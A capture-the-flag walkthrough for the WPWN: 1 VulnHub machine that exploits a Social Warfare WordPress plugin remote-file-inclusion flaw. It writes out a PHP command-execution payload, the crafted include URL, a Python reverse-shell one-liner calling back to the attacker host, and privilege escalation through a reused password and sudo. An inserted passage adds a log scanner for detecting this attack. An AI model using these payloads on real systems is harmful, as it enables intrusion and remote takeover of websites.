WPWN: 1 VulnHub capture the flag walkthrough
Please note: I have used Oracle Virtual Box to run the downloaded machine. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.
Follow these steps to finish the CTF:
- Getting the target machine’s IP address by running the VM
- Getting open port details by using the Nmap tool
- Enumerating HTTP service with Dirb utility
- Identifying vulnerability in WordPress
- Taking remote shell by exploiting remote code execution vulnerability
- Getting the root shell
The first step to start solving any CTF is to identify the target machine’s IP address. Since we are running a virtual machine in the same network, we can identify the target machine’s IP address by running the netdiscover command. The output of the command can be seen in the following screenshot.
Command used: << netdiscover >>
In the above screenshot, we can see that we have identified the IP addresses of all the devices connected to our router, but for privacy reasons we have hidden the MAC addresses of our personal devices. Our target machine’s IP address, which we will be working with throughout this challenge, is 192.168.1.25. We will be using 192.168.1.22 as the attacker IP address.
Note: The target machine’s IP address may be different in your case, as it is being assigned by the network DHCP.
After getting the target machine’s IP address, the next step is to find out the open ports and services available on the machine. We will use the Nmap tool for it, as it works effectively and is available on Kali Linux. The results can be seen below.
Command used: << nmap -sV -p- 192.168.1.25 >>
The Nmap output shows two ports on the target machine that have been identified as open. In the Nmap command, we used the “-sV” switch for version enumeration. We also used the “-p-” option for a full port scan. It tells Nmap to conduct the scan on all 65535 ports on the target machine. By default, Nmap conducts the scan only on the known 1024 ports. So, it is especially important to conduct a full port scan during a pentest or while solving a CTF for maximum results.
In our case, two ports have been identified as open during the scan: port 22 is being used for SSH and port 80 is being used for HTTP.
In the next step, we will start with the HTTP port 80.
We opened the target machine’s IP address on the browser to see the running web application. It can be seen in the following screenshot.
As we can see in the above screenshot, there is a static page with a message saying that the goal is not just to get the root shell; we also have to read the root flag to complete the challenge. So, let us run the Dirb utility to identify hidden folders, as can be seen in the following screenshot.
Command used: << dirb http://192.168.1.25/ >>
In the above screenshot, we can see the output of the Dirb utility, which has generated a large output. We analyzed all the identified directories and found a WordPress folder. Let’s open this folder in the browser.
We can see in the screenshot that there is a WordPress website that is not working properly. In the next step, we will run a WordPress vulnerability scanner to identify vulnerabilities.
So far, we know that our target machine is running a WordPress website. Let’s start WPScan, which is available on Kali Linux and is a very good tool for identifying vulnerable components in WordPress websites.
Command used: << wpscan --url http://192.168.1.25/wordpress >>
In the highlighted area of the above screenshot, we can see that the scanner has identified an outdated plugin. So, let us search Google for known vulnerabilities in this plugin and their exploits.
The first Google result shows that the plugin is vulnerable to remote code execution. We open the exploit DB URL as follows.
As per the information given on the exploit-db page, the remote execution exploit is written in Python. So, let’s download the exploit on our attacker machine by using the wget utility, which can be seen in the below screenshot.
After downloading the exploit, we tried to execute it, but the exploit was broken and was showing errors. We spent some time debugging the error, but it was taking too long. During further research, we found that the vulnerability can also be exploited manually and the manual process was already explained on another website that can be seen in the following screenshot.
As per the details given on the website, we have to craft the payload in a text file and make the target fetch and include that file remotely.
We have to create a text file containing the command we want to execute on our target system. After that, we put this file in the document root of our attacker machine, start the Apache server and reference the file in the URL. All the commands used can be seen in the following screenshot.
- << cat >> shell.txt <pre>system('cat /etc/passwd')</pre> >>
- << /etc/init.d/apache2 start >>
- << ifconfig eth0 >>
As can be seen in the above screenshot, we created a text file containing the command to read the /etc/passwd file. Then we started Apache. After that, we crafted the complete URL which we need to open in the browser.
http://192.168.1.25/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.1.22/hehe/shell.txt
In the above screenshot, we can see that our command was successfully executed on the target machine and we can see the content of the /etc/passwd file. We analyzed the file and learned that there is a user named “takis” on the target machine.
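A defender-side counterpart to the request above, added here and not part of the original walkthrough: a small Python scanner that reads Apache combined-format access logs and flags admin-post.php requests carrying swp_debug=load_options, especially when swp_url points to a host other than the site itself. The log lines are constructed samples; the site host 192.168.1.25 and the parameter names are taken from this page.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed Apache access-log lines (not from the original page): two requests
# mirroring the swp_debug=load_options&swp_url=... pattern and two benign ones.
SAMPLE_LOG = """\
192.168.1.22 - - [10/Oct/2020:12:00:01 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.1.22/hehe/shell.txt HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.1.22 - - [10/Oct/2020:12:00:05 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.1.22/hehe/shell.txt&cmd=ls HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
192.168.1.30 - - [10/Oct/2020:12:01:00 +0000] "GET /wordpress/ HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
192.168.1.30 - - [10/Oct/2020:12:01:02 +0000] "GET /wordpress/wp-admin/admin-post.php?action=save HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Enough of the Apache combined format to extract client IP, timestamp and request path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_request(path, site_host):
    """Return a short reason if the request looks like Social Warfare
    swp_debug=load_options abuse, otherwise None."""
    url = urlparse(path)
    if not url.path.endswith("/wp-admin/admin-post.php"):
        return None
    qs = parse_qs(url.query)
    if qs.get("swp_debug", [""])[0] != "load_options":
        return None
    swp_url = qs.get("swp_url", [""])[0]
    include_host = urlparse(swp_url).hostname   # where the included file is fetched from
    cmd = qs.get("cmd", [None])[0]              # extra parameter seen in the follow-up step
    if include_host and include_host != site_host:
        reason = f"remote include from {include_host}"
    elif swp_url:
        reason = "load_options with local swp_url"
    else:
        reason = "load_options probe without swp_url"
    return reason + (f", cmd={cmd!r}" if cmd else "")

def scan_log(lines, site_host):
    """Return a list of (client_ip, timestamp, reason) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify_request(m["path"], site_host)
        if reason:
            hits.append((m["ip"], m["ts"], reason))
    return hits

if __name__ == "__main__":
    for ip, ts, reason in scan_log(SAMPLE_LOG.splitlines(), "192.168.1.25"):
        print(f"{ts} {ip}: {reason}")
```

Any hit on the site’s own host, or a bare load_options probe, is still worth a look; the remote-include case is the one that indicates the vulnerable plugin version is actually being exercised.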
So far, we can only execute fixed commands on our target system. Let’s put PHP code in the file so that we can pass any command through the URL. The code can be seen in the following screenshot.
Command used: << cat >> shell.txt <pre>system($_GET['cmd'])</pre> >>
We have written PHP code which takes input from the GET parameter “cmd” and runs it on the machine. Let’s try to run the ls command through the URL as follows:
The output of the ls command can be seen as part of the HTML page. Now, let’s create a Python reverse shell to get shell access. The Python code can be seen in the following screenshot.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.22",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'
This Python code opens a TCP socket, connects back to the given IP address and port, and attaches a bash shell to it. Let us run this code to get the shell connection.
Command used: << nc -lvp 1234 >>
First, we started the Netcat listener on our attacker machine. After that, we ran the Python code through the URL, which gave us the reverse shell connection. Now, let’s run the id command to see the privileges of the shell.
Command used: << id >>
As we can see above, we got limited shell access, so in the next step, we will try to get the root access.
Now, let’s enumerate the target machine with these privileges and try to gain further access. We started gathering information by running the “cat /etc/issue” and “uname -a” commands to identify the operating system and kernel version. The output of the commands can be seen below.
- << cat /etc/issue >>
- << uname -a >>
We tried to research the above versions over the web to find a working exploit, but nothing of substance could be found. We continued exploring the target machine further and tried to access various informational files commonly found on a Linux machine.
During this, we found some interesting information in the “wp-config.php” file, which can be seen below.
As we can see in the wp-config file, we found the database password. It is possible that the same password was reused for other logins. Let’s try this password with the user “takis,” which we identified in the previous steps.
Command used: << su takis >>
The password worked successfully and now we are logged into the target machine as user “takis.” We can now access more files on the target machine. We found the user flag in the “takis” home directory. The flag file “user.txt” can be seen in the following screenshot.
Command used: << cat user.txt >>
We have one more flag to go, the root flag. We used the “sudo -l” command to check the current user’s privileges. It turns out that the current user has full sudo privileges over the system. So, we used the “sudo su” command to get root access without entering any password. The result can be seen in the screenshot given below.
- << sudo -l >>
- << sudo su >>
As we can see above, we now have root access to the target machine, as verified by running the “id” command. Let’s find the flag file and complete the challenge.
Command used: << cat /root/root.txt >>
There was a “root.txt” file in the “root” directory. But it seems that it is not the flag file, as can be seen in the message above. The hint suggests that the “root.txt” flag might be located among the USB files. So, let us dig further.
Command used: << find . -name "root" 2>/dev/null >>
We used the “find” command to locate all files named “root.” The result gave us a huge output; however, there was only one path that included a “USB” folder. We opened that “root” file and were finally able to read the flag.
Command used: << cat /usr/games/USB/root >>
In the above screenshot, we can see the root flag. This completes the challenge.
Sources
- WordPress Plugin Social Warfare < 3.5.3 – Remote Code Execution, Exploit Database: https://www.exploit-db.com/exploits/46794
- Social Warfare <= 3.5.2 – Unauthenticated Remote Code Execution (RCE), WPScan: https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618
- WPWN: 1, VulnHub: https://www.vulnhub.com/entry/wpwn-1,537/
- WPWN: 1 (download), VulnHub: https://download.vulnhub.com/wpwn/wpwnvm.zip
- WPWN: 1 (torrent), VulnHub: https://download.vulnhub.com/wpwn/wpwnvm.zip.torrent